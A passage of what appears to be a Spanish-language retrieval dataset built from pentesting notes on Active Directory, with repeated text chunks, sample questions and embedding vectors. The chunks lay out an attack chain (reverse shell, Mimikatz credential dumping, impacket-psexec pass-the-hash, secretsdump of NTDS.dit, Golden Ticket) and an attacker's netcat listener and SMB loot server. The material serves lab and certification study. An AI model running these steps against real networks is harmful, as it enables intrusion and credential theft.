0.02015, -0.01559, -0.04022, -0.01369, 0.03304, -0.07597, -0.02706, -0.01607, -0.00853, -0.05039, -0.01549, -0.01855, -0.0351]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La cadena de ataque \"OSCP tΓ­pica\" con esto", "indexar": "Con quΓ© puedo simular un ataque tipo OSCP en mi laboratorio?", "v": [-0.09289, 0.00302, -0.17892, -0.13197, -0.1385, -0.192, -0.00626, 0.05862, -0.07325, -0.0317, -0.04364, -0.06038, 0.03766, 0.00747, 0.02679, -0.00846, 0.04375, -0.0184, -0.0382, -0.09038, -0.06825, -0.02911, -0.11126, -0.03939, 0.08855, 0.08621, 0.02507, -0.01079, -0.04408, -0.12631, -0.05361, 0.1059, 0.12343, -0.01118, -0.03587, -0.0379, -0.09725, -0.05399, 0.09308, 0.18151, 0.05023, 0.00421, -0.09418, -0.01092, 0.13558, -0.08831, 0.03632, -0.03692, -0.00473, -0.07617, -0.08145, -0.05782, -0.13662, -0.03386, -0.07145, -0.07232, 0.07616, -0.09204, 0.1842, -0.03418, -0.01166, -0.00234, -0.01328, -0.10173, 0.06197, -0.06308, -0.03708, 0.00438, -0.08147, 0.03906, -0.04719, 0.0757, -0.04455, -0.0214, 0.02844, -0.08751, -0.06801, 0.02959, 0.16256, -0.08123, 0.01448, 0.00433, -0.00045, 0.03735, -0.04632, -0.07811, 0.11159, 0.01408, -0.03056, -0.06824, -0.04277, 0.00655, -0.00657, 0.05596, -0.01895, -0.12554, 0.07888, -0.03031, 0.00303, -0.01413, 0.02653, 0.05612, -0.12399, 0.13328, -0.07697, 0.04613, 0.03118, -0.0669, 0.07982, -0.10971, 0.031, -0.04194, -0.11395, -0.05329, -0.03308, 0.0058, -0.01365, -0.03115, 0.04569, -0.04254, -0.07626, 0.04474, -0.00198, 0.01453, -0.08938, 0.01503, 0.0266, -0.02253, -0.04981, 0.02253, -0.02823, 0.03086, -0.03004, -0.02461, 0.03747, 0.00801, -0.04298, -0.09453, -0.01479, -0.00786, 0.04281, 0.14214, 0.02132, -0.1053, -0.05526, 0.0129, -0.02724, -0.01742, -0.06984, -0.01218, 0.00399, -0.04492, 0.04333, 0.06809, -0.1497, -0.00957, 0.04867, -0.06689, -0.00954, 0.13078, -0.04847, 0.01486, -0.05631, -0.00986, 0.00684, 0.04032, 0.03595, -0.1138, 0.01891, 0.05785, -0.04223, 0.01729, 0.02263, -0.03416, 0.08862, 0.00768, -0.06325, -0.05586, 0.03135, -0.0624, -0.02964, 0.06683, 0.00219, -0.02211, 0.01167, -0.01351, 0.01137, 0.04721, 0.08751, 0.04211, 0.02924, 0.0231, 0.00697, -0.04555, 0.02518, -0.0193, 0.08253, -0.01639, 0.03974, 0.01371, 0.01004, -0.04272, -0.04664, -0.0555, 0.07256, 0.09265, -0.06825, 0.02316, -0.03112, 0.02854, 0.04917, -0.00814, 0.10507, -0.05441, -0.017, 0.03544, 0.09139, 0.07451, 0.00676, -0.00348, 0.03506, -0.00808, 0.00816, 0.01248, -0.05392, 0.04051, -0.01058, -0.01228, 0.03042, 0.02794, 0.00427, 0.00094, 0.07657, -0.02592, 0.04331, 0.03649, 0.02965, -0.01128, -0.10567, -0.0052, 0.02177, 0.07083, -0.00801, -0.04275, -0.02725, -0.02889, -0.09294, -0.02486, 0.01526, -0.03349, 0.00233, -0.03184, 0.04634, -0.11649, 0.03451, 0.05757]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que herramienta puedo usar para enumerar permisos en una mΓ‘quina Windows?", "v": [0.03434, 0.0782, -0.12473, -0.20283, -0.00453, -0.04445, -0.16727, -0.07315, -0.06364, -0.18984, -0.08623, -0.0039, 0.03971, -0.05607, -0.00566, 0.01065, 0.0279, -0.07049, -0.02961, 0.05081, 0.03668, -0.04139, -0.12381, 0.04244, -0.09512, 0.07322, 0.06892, -0.07283, -0.27797, 0.01701, 0.00119, 0.06877, 0.08052, -0.11826, -0.0396, -0.05605, -0.05424, 0.07123, 0.06611, 0.04116, 0.05211, 0.12009, -0.1103, 0.06027, 0.05173, -0.01949, 0.02064, -0.02241, 0.01725, 0.02085, -0.06081, -0.13897, -0.08789, -0.03128, 0.05133, -0.15048, 0.23461, -0.06377, -0.00305, -0.01519, -0.06454, 0.03295, -0.08081, 0.05988, -0.06256, 0.04118, 0.04909, -0.0468, -0.02667, 0.10823, -0.08765, 0.02667, 0.08394, -0.01728, 0.07686, -0.00213, -0.08064, -0.01525, 0.10037, -0.00585, 0.0385, 0.01332, -0.05592, -0.08966, -0.03306, -0.13802, 0.08111, -0.03873, 0.07517, -0.10955, -0.0039, 0.05891, -0.0446, 0.00507, 0.11535, -0.04399, -0.00168, 0.00043, -0.00016, 0.04284, 0.12319, -0.08005, -0.04388, 0.12121, -0.07601, 0.05242, 0.02757, -0.07691, -0.09473, -0.04556, 0.044, 0.02853, -0.05357, 0.00644, -0.04671, 0.05431, -0.04435, -0.09943, -0.04109, -0.02626, 0.03993, 0.0212, -0.04848, -0.01419, 0.03581, -0.05791, -0.0589, 0.16371, -0.11365, -0.08969, 0.05929, 0.0016, -0.05942, 0.01351, -0.06898, 0.04984, 0.00935, -0.08367, -0.02599, -0.07146, 0.04216, 0.09518, -0.02498, -0.0388, 0.01545, 0.02599, 0.00409, -0.01376, -0.04357, -0.07826, 0.10293, -0.06462, -0.00947, 0.0575, -0.04987, 0.06278, -0.02075, 0.06217, -0.03875, 0.03738, -0.04258, -0.02314, -0.02005, 0.03256, 0.03258, 0.00983, 0.02022, 0.0266, 0.01406, 0.01029, 0.00505, 0.03968, 0.03706, -0.00562, 0.0313, -0.01585, -0.00675, 0.01335, -0.04381, -0.03836, -0.0649, 0.01447, -0.04263, -0.08238, -0.00539, 0.01229, -0.00063, 0.00139, -0.00699, 0.02685, -0.05314, 0.06485, 0.06621, -0.07766, 0.03891, 0.00968, -0.0147, -0.00185, 0.04688, -0.04019, -0.04268, 0.00799, -0.07856, -0.04423, 0.09025, 0.02968, -0.05157, 0.01429, 0.03594, -0.00396, 0.0149, -0.02667, 0.00258, -0.03928, -0.03095, -0.03803, 0.00148, 0.01283, -0.03646, -0.06052, 0.08318, -0.01366, 0.0332, 0.04201, 0.01249, -0.0049, 0.00203, 0.01126, 0.02639, 0.02213, 0.01163, 0.0187, -0.00117, -0.03885, 0.01037, -0.03441, 0.03467, -0.04065, -0.04426, -0.00461, -0.02527, 0.0494, 0.03063, -0.04458, -0.06073, -0.02044, -0.00266, -0.03232, -0.04694, -0.08497, 0.0115, 0.02406, 0.03684, -0.03447, -0.0041, 0.04382]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual programa sirve para extraer contraseΓ±as de la memoria en Windows?", "v": [0.09605, 0.04197, -0.07182, -0.17964, 0.00909, -0.10453, -0.01553, -0.10678, -0.08053, -0.13176, -0.02106, -0.00835, -0.00338, -0.12196, -0.04119, 0.00562, 0.172, -0.01942, 0.07175, 0.0698, -0.02503, -0.02677, -0.03301, 0.02531, -0.08921, 0.02217, 0.00646, 0.02839, -0.08837, 0.03559, 0.03279, 0.00222, 0.08519, -0.09113, 0.00944, 0.1513, 0.02208, 0.10208, 0.01805, 0.08904, 0.10845, 0.10499, -0.08082, 0.10585, 0.06065, -0.04726, 0.09205, 0.02288, 0.13451, -0.04947, -0.0669, 0.01216, 0.03735, -0.05143, 0.09143, -0.09099, 0.03314, -0.05903, -0.0484, 0.05893, -0.03801, 0.08337, 0.03182, 0.03077, 0.00654, -0.05035, 0.08828, 0.02162, -0.06542, 0.14442, -0.11964, 0.02779, 0.10341, -0.01165, 0.0057, 0.04043, 0.00206, -0.03581, 0.07691, 0.04609, -0.06517, -0.00952, 0.024, -0.05039, -0.05443, 0.01022, 0.0385, -0.01255, 0.02955, -0.09155, 0.0745, 0.01502, -0.04644, 0.1797, 0.09579, -0.10744, 0.08457, 0.11068, 0.02506, 0.09467, 0.02146, -0.0849, -0.05699, 0.20615, -0.02587, 0.07146, 0.00171, -0.01808, -0.07987, -0.05372, 0.03913, 0.01867, -0.09002, -0.021, -0.10829, 0.00785, 0.03323, -0.04721, 0.07018, 0.02766, -0.08584, -0.04425, -0.03772, 0.02789, 0.0329, 0.01893, -0.0441, 0.08981, -0.11904, -0.0066, 0.04787, 0.07278, -0.02394, -0.05601, -0.07558, 0.02544, 0.04448, -0.01998, -0.01674, -0.04969, 0.0881, 0.03547, 0.02417, 0.01851, -0.03033, 0.08977, 0.11594, 0.09086, -0.02083, -0.01947, 0.03505, -0.01209, 0.02963, 0.0485, -0.05145, 0.00239, -0.01879, -0.0022, -0.08216, 0.08156, -0.08101, -0.02636, -0.02894, -0.04214, -0.00514, -0.05019, -0.06568, 0.09223, 0.11103, 0.05389, -0.00068, -0.00253, 0.00777, -0.0661, -0.02169, 0.01394, -0.00615, -0.09067, 0.04008, -0.03199, -0.11156, 0.01111, 0.01857, 0.01402, -0.05167, -0.08763, 0.01745, 0.0304, -0.04269, -0.04898, -0.02718, -0.04241, 0.02729, -0.00415, -0.00545, -0.05431, -0.06027, -0.03824, 0.07547, -0.02985, -0.04994, 0.0577, -0.04762, -0.01808, 0.07317, 0.12892, -0.0607, -0.00846, 0.02487, 0.06434, 0.00369, 0.00225, -0.00454, -0.02201, -0.0999, -0.07717, -0.00155, 0.01526, 0.00176, -0.01779, 0.01336, 0.00141, 0.08047, 0.06618, -0.06227, -0.06889, -0.00891, 0.04089, -0.0094, -0.03704, -0.02658, 0.0447, -0.02533, -0.00941, 0.06902, 0.0014, -0.07073, -0.06602, -0.00296, -0.06527, -0.06653, 0.03981, -0.05089, -0.0837, -0.09383, -0.01401, -0.01466, 0.04266, 0.041, -0.05121, -0.03881, 0.03106, 0.02024, -0.00364, 0.01485, 0.03206]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚\n β”‚ 1) RCE inicial en una web ───────► reverse shell PowerShell β”‚\n β”‚ (sqli, file upload, etc.) en mΓ‘quina USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 2) WinPEAS desde tu carpeta ──► subes y ejecutas β”‚\n β”‚ enumera permisos, AlwaysInstallElevated, etc. β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 3) Local privesc ──► SYSTEM en USUARIO1 β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 4) Mimikatz ──► sekurlsa::logonpasswords β”‚\n β”‚ β†’ hash NTLM de un usuario de dominio (DOMAIN\\juan) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 5) BloodHound ──► \"ΒΏjuan es admin en algΓΊn sitio?\" β”‚\n β”‚ \"ΒΏjuan puede llegar a Domain Admin por algΓΊn camino?\" β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 6) Impacket-psexec con el hash de juan ──► shell en SERVER2 β”‚\n β”‚ impacket-psexec -hashes :HASH 'juan@server2.local' β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 7) Si server2 = Domain Controller: β”‚\n β”‚ impacket-secretsdump ──► vuelcas TODA la BD del dominio β”‚\n β”‚ (NTDS.dit, krbtgt, etc.) β”‚\n β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ β–Ό β”‚\n β”‚ β”‚\n β”‚ 8) Con hash de krbtgt: β”‚\n β”‚ impacket-ticketer ──► Golden Ticket β†’ eres dios β”‚\n β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que me ayudo a pasar de usuario a administrador local?", "v": [-0.08621, 0.11762, 0.0339, -0.22563, -0.08168, 0.00837, -0.0187, -0.10757, -0.12328, -0.06889, -0.02703, -0.10312, 0.00593, -0.0004, -0.02405, -0.15385, 0.13962, -0.05179, 0.08878, 0.09352, 0.10579, 0.04841, 0.09839, 0.0908, -0.02266, -0.04521, 0.11397, -0.15253, -0.01636, -0.08344, 0.02713, 0.01999, -0.04018, -0.07891, 0.00415, -0.06585, 0.09736, -0.03923, -0.0853, 0.15593, 0.05326, -0.05379, -0.09678, -0.01798, 0.00734, 0.11992, -0.09224, -0.14306, 0.08244, 0.09617, -0.06619, -0.15284, -0.16687, 0.02461, 0.08688, 0.07829, 0.0917, -0.07557, 0.15219, -0.0672, -0.12284, 0.0287, 0.02974, 0.12662, -0.02652, -0.01003, 0.08714, 0.01771, -0.02084, 0.05888, 0.00255, 0.05379, -0.04116, -0.00836, 0.09129, 0.10691, 0.02013, 0.07961, 0.07246, -0.00314, -0.00674, -0.03728, -0.04749, -0.00134, -0.09477, -0.126, 0.01081, -0.13708, 0.01809, 0.03571, 0.06374, -0.08607, 0.04056, -0.04105, 0.00922, -0.08656, 0.06797, 0.01721, -0.10168, 0.02488, 0.04526, 0.0113, -0.00317, 0.09885, 0.03284, 0.02333, 0.01634, 0.01408, 0.03572, -0.0128, 0.09668, -0.00186, -0.02464, 0.0023, -0.05558, 0.09873, -0.06088, -0.03708, -0.05378, 0.01606, -0.00998, -0.0673, 0.03829, -0.02749, -0.00413, 0.04284, 0.02478, 0.0926, -0.02764, 0.00198, -0.03497, -0.06468, 0.02645, 0.00681, -0.10038, 0.03324, -0.03546, -0.00871, 0.01791, 0.03108, -0.09432, 0.05054, -0.00246, 0.03652, 0.12777, 0.01408, -0.04549, -0.06305, -0.04139, 0.03849, -0.00157, -0.06463, -0.00464, 0.05863, -0.09401, 0.01468, 0.07669, -0.02761, 0.02649, 0.0588, -0.0239, -0.02634, 0.03196, 0.02078, -0.05895, -0.07536, -0.05697, -0.04702, 0.06346, -0.03535, -0.06871, 0.05461, -0.02087, 0.01212, 0.05771, -0.01754, 0.00871, -0.07418, -0.01235, -0.01043, 0.03759, 0.03233, 0.02562, 0.1087, -0.08511, -0.06068, -0.04654, 0.07573, -0.0131, 0.04501, 0.05489, 0.02683, 0.00984, -0.04852, 0.00882, -0.03006, -0.01816, 0.03674, -0.06654, -0.03568, -0.01544, 0.01266, -0.01686, 0.03221, 0.0031, 0.03376, -0.0418, 0.04905, 0.00404, 0.05015, 0.01729, -0.00211, 0.04121, 0.03708, 0.00273, -0.06313, 0.08358, -0.02809, -0.0324, -0.04643, 0.02528, 0.05471, 0.05994, 0.01626, 0.02265, -0.02629, 0.05166, -0.03077, 0.00642, 0.05321, -0.05992, 0.01715, -0.02508, -0.00588, 0.0181, -0.01872, 0.03241, 0.0029, -0.00862, -0.07537, -0.01606, 0.06059, 0.02686, -0.03775, -0.06824, -0.02892, -0.09661, 0.00921, -0.04583, -0.02869, 0.01872, -0.03103, 0.04293, -0.00525, -0.00628, 0.01186]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que programa sirve para escuchar comandos en Kali Linux", "v": [-0.03183, 0.10179, -0.10763, -0.19206, -0.0522, -0.25561, -0.10074, 0.07865, -0.0594, -0.03428, -0.01478, -0.07558, 0.04249, -0.10386, 0.0196, 0.01554, 0.06193, -0.07012, -0.00983, -0.06722, 0.01149, 0.08216, -0.11096, -0.00871, 0.05558, 0.07652, 0.1405, -0.1358, 0.05883, 0.01109, -0.08182, 0.04614, 0.0129, -0.05534, -0.0354, 0.05877, -0.02997, 0.05014, 0.06726, 0.17194, 0.04956, 0.02859, -0.03615, 0.01371, -0.02454, -0.15691, 0.10911, -0.00396, 0.13067, -0.06288, 0.06925, 0.00785, -0.01922, 0.02804, 0.0702, -0.05595, 0.06936, -0.15909, -0.02865, -0.01515, -0.16047, -0.10743, 0.05563, -0.02846, 0.07267, 0.01105, 0.01579, -0.02433, -0.0952, 0.04288, -0.1031, 0.10187, -0.0231, 0.01583, 0.01505, -0.02116, -0.10075, -0.01393, 0.1127, -0.01754, 0.03744, -0.00865, 0.02588, 0.08592, -0.10259, -0.07561, 0.04303, 0.004, -0.08256, 0.08503, 0.00024, 0.0929, 0.03642, 0.10701, 0.18692, 0.05601, 0.11551, 0.0811, 0.0434, 0.02844, 0.00677, -0.01792, -0.0737, 0.09383, 0.03296, 0.07757, 0.08981, -0.09635, 0.06075, 0.01275, -0.01168, -0.06068, 0.03208, -0.03114, -0.06779, -0.09174, -0.02191, -0.01175, 0.03134, -0.00534, -0.05123, 0.07339, -0.02696, 0.06092, -0.02839, -0.05355, -0.05839, 0.06812, 0.03563, -2e-05, 0.05256, -0.07661, 0.08836, -0.02536, -0.01577, -0.00903, -0.00335, -0.04981, -0.0554, -0.0294, 0.06307, 0.09808, 0.00605, 0.05741, 0.05788, -0.02947, 0.02708, -0.05063, 0.02154, -0.05488, 0.02566, 0.02827, -0.04274, -0.02479, -0.08394, -0.09296, 0.01678, -0.01669, -0.09247, 0.01162, -0.04518, -0.02211, -0.0041, -0.01463, 0.04738, -0.04607, -0.00201, 0.05793, 0.06422, 0.01415, -0.02335, 0.04778, 0.07495, -0.08553, -0.0807, -0.07303, 0.02375, -0.03332, 0.06547, 0.00394, -0.08765, 0.07444, -0.03518, -0.03462, 0.01318, 0.00518, -0.05886, 0.03054, -0.02907, -0.03202, 0.00229, 0.03266, -0.02062, -0.0398, 0.00285, 0.01351, 0.00695, -0.00041, -0.0871, 0.00025, -0.11875, 0.0541, -0.00143, -0.06804, 0.05423, 0.03475, -0.01377, 0.00942, 0.01953, 0.09126, -0.01227, 0.01178, 0.03618, 0.06253, -0.01593, -0.05577, 0.00711, 0.06146, 0.03282, 0.04683, -0.0313, -0.0098, 0.07677, 0.01287, -0.00809, -0.07332, 0.00869, -0.03497, 0.0541, 0.0135, -0.00178, -0.01213, 0.01336, 0.02251, -0.01887, -0.01319, -0.03197, 0.06371, -0.00207, -0.06592, -0.03285, 0.07065, 0.00327, -0.10949, -0.01078, -0.04765, -0.03204, 0.00616, -0.02752, -0.00014, -0.05526, 0.0314, 0.00957, -0.03819, -0.0188, 0.02404]} -{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### A) Levantas tu \"puesto de mando\" en Kali (terminales abiertos)\n\n```\nβ”Œβ”€ Terminal 1 (listener de shells) ─────────────────────────┐\nβ”‚ stty raw -echo; (stty size; cat) | nc -lvnp 4444 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 2 (HTTP para servir tus tools a la vΓ­ctima) ────┐\nβ”‚ cd tu carpeta β”‚\nβ”‚ python3 -m http.server 80 β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 3 (SMB para que la vΓ­ctima TE envΓ­e ficheros) ──┐\nβ”‚ mkdir /tmp/loot && cd /tmp/loot β”‚\nβ”‚ impacket-smbserver loot . -smb2support β”‚\nβ””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n\nβ”Œβ”€ Terminal 4 (tu shell de trabajo: nxc, impacket, etc.) ───┐\nβ”‚ $ 